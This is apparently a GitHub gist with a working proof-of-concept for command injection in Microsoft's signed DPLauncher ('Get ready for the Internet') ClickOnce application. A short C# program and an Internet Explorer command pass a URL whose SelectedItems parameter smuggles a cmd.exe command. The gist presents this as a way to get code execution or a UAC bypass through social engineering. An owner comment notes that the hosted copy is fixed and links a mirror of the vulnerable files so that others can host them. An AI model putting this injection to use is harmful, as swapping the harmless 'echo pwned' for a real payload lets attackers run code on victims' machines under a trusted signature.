Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Command injection in MS' One Step / DPLauncher / "Get ready for the Internet" application, for UAC / RCE through social engineering using MS signed exe / clickonce.
using System;
using System.Runtime.InteropServices;
class DPPwned {
[DllImport("dfshim.dll")]
public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags);
public static void Main() {
LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0);
}
}
iexplore https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+
Also works in Edge!
Mirror of the files: http://lucasm.cf/?zmnlz
@Wack0

This comment has been minimized.

Copy link
Owner Author

commented Oct 22, 2016

Please note that the version of DPLauncher on onestepfreinstaller.blob.core.windows.net has now been fixed. Exploitation will now require hosting the files yourself. Here's a mirror of the old version: http://lucasm.cf/?zmnlz

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.